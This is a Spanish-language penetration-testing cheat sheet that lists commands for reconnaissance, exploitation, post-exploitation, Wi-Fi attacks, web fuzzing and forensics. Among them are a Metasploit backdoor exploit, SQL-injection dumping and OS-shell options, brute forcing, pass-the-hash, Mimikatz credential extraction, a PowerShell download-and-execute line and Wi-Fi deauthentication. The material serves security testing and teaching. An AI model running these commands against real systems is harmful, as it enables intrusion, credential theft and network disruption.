nmap
Escaneo activo de puertos/servicios con scripts NSE.
- Modo completo:
nmap -sC -sV -A -oA cliente 10.10.0.0/24 - Barrido rápido:
nmap -F --top-ports 100 target
referencia rápida
Una pestaña completa con utilidades para reconocimiento, explotación, post-explotación, Wi-Fi, análisis forense y automatización. Cada bloque incluye casos de uso reales y ejemplos reproducibles.
fase 01
Herramientas para mapear superficies de ataque, descubrir dominios, puertos, servicios y rutas internas.
Escaneo activo de puertos/servicios con scripts NSE.
nmap -sC -sV -A -oA cliente 10.10.0.0/24nmap -F --top-ports 100 targetEscaneo TCP asincrónico a gran velocidad. Ideal para rangos enormes.
sudo masscan 0.0.0.0/0 -p1-65535 --rate 10000 -oJ hallazgos.jsonWrapper de nmap escrito en Rust que detecta puertos en segundos.
rustscan -a 10.10.11.5 --ulimit 5000 -- -sC -sVEnumeración de subdominios mediante fuentes pasivas/activas.
amass enum -d empresa.com -o subdominios.txtamass intel -whois -d empresa.comPipeline rápido para descubrir subdominios y verificar servicios HTTP.
subfinder -d empresa.com -silent | httpx -silent -status-codeCaptura screenshots de superficies web encontradas.
cat hosts.txt | aquatone -ports 80,443,8080 -out recon/Enumeración SMB/NetBIOS en entornos Windows.
enum4linux-ng -A 10.10.10.0 -oA smb_reconConsulta directorios LDAP/AD para listar usuarios, grupos o políticas.
ldapsearch -x -H ldap://dc01 -D "user@dom.local" -w pass -b "dc=dom,dc=local"fase 02
Utilidades para aprovechar vulnerabilidades y obtener shells controladas.
Framework modular de exploits y payloads listos.
msfconsole -q -x "search vsftpd; use exploit/unix/ftp/vsftpd_234_backdoor"set RHOSTS 10.10.10.5; set LHOST tun0; runAutomatiza SQLi desde detección hasta exfiltración.
sqlmap -r request.txt --risk=2 --level=3 --batch --dumpsqlmap -u "https://site/id=1" --os-shellFuerza bruta paralela contra múltiples protocolos.
hydra -L users.txt -P rockyou.txt ftp://10.10.10.8hydra -l admin -P pass.txt http-post-form "/login:usr=^USER^&pwd=^PASS^:F=error"Swiss army knife para entornos Windows/AD.
cme smb 10.10.10.0/24 -u user -p pass --sharescme smb target -u user -H NTLMHASH -x "whoami"Consulta local de exploits en Exploit-DB.
searchsploit ProFTPD 1.3.5searchsploit -x exploits/linux/remote/12345.txt para leer el PoC.Envenena LLMNR/NBNS para capturar hashes NTLM.
sudo responder -I eth0 -dwPvfase 03
Scripts y utilidades para escalar privilegios, pivotar y recolectar credenciales.
Enumeran configuraciones débiles en Linux/Windows.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.shpowershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://winpeas.ps1')"Extracción de credenciales y tickets Kerberos (solo con permiso).
privilege::debugsekurlsa::logonpasswordsMapean grafos de privilegios en AD.
Invoke-BloodHound -CollectionMethod All -ZipFile loot.zipTúneles para pivotar a redes internas.
./chisel server -p 8000 --reversesshuttle -r user@host 10.10.0.0/24Scripts para SMB, Kerberos, DCOM, etc.
GetUserSPNs.py dominio/user:pass -requestpsexec.py dom/user:pass@target cmd.exefase inalámbrica
Automatiza auditorías de redes inalámbricas y captura handshakes.
Modo monitor y captura de handshakes WPA.
airmon-ng start wlan0airodump-ng wlan0mon --bssid <AP> --channel 6 -w capturaDesautenticación para forzar handshakes.
aireplay-ng -0 10 -a <AP> -c <CLIENTE> wlan0monFramework MITM multi-protocolo con módulos Wi-Fi.
sudo bettercap -iface wlan0set wifi.recon onCaptura PMKID/handshakes y crackea con GPU.
hcxdumptool -i wlan0mon -o handshakes.pcapng --enable_status=15hashcat -m 22000 handshakes.hc22000 rockyou.txtfase web
Herramientas para interceptar, automatizar y fuzzear aplicaciones web.
Proxies interceptores con módulos de escaneo.
java -jar burpsuite_community.jarzaproxy -daemon -config api.key=TOKENFuzzer ultrarrápido para directorios, subdominios y parámetros.
ffuf -w SecLists/Discovery/Web-Content/common.txt -u https://site/FUZZffuf -u https://site/admin?user=FUZZ -w users.txt -X POSTMotor de plantillas para detectar CVEs y malas configuraciones.
nuclei -t cves/ -u https://sitenuclei -l urls.txt -tags takeovers,misconfigDescubren rutas ocultas y virtual hosts.
gobuster vhost -u https://site -w subdomains.txtdirsearch -u https://site -e php,txt,confPruebas de APIs REST; ejecuta colecciones desde CLI.
newman run coleccion.json -e entorno.jsonfase forense
Revisión de tráfico, memoria y artefactos para responder incidentes.
Captura y filtrado CLI de paquetes.
sudo tcpdump -i eth0 -nn -w captura.pcaptshark -r captura.pcap -Y "http.request"GUI poderosa para análisis profundo.
tcp.stream eq 5Analiza volcados de memoria en sistemas Windows/Linux.
vol -f mem.raw windows.pslistvol -f mem.raw windows.hashdumpFramework para analizar discos, timelines y artefactos.
fls -r -m / imagen.ddautopsy para GUI.fase 360
Orquesta tus pruebas con scripts y pipelines reproducibles.
Lenguaje versátil para PoCs, bots y clientes personalizados.
python3 -m venv env && source env/bin/activaterequests, scapy, pwntools.Automatiza tareas repetitivas en Linux.
#!/bin/bash; for host in $(cat hosts); do nmap -sC -sV $host; doneDespliegue de laboratorios y herramientas.
ansible-playbook setup-lab.yml -i inventarioAPIs Python para SMB/Kerberos, útiles en pipelines.
python3 secretsdump.py dom/user@host -hashes LMHASH:NTHASHCompila herramientas estáticas y portables.
GOOS=linux GOARCH=amd64 go build cmd.go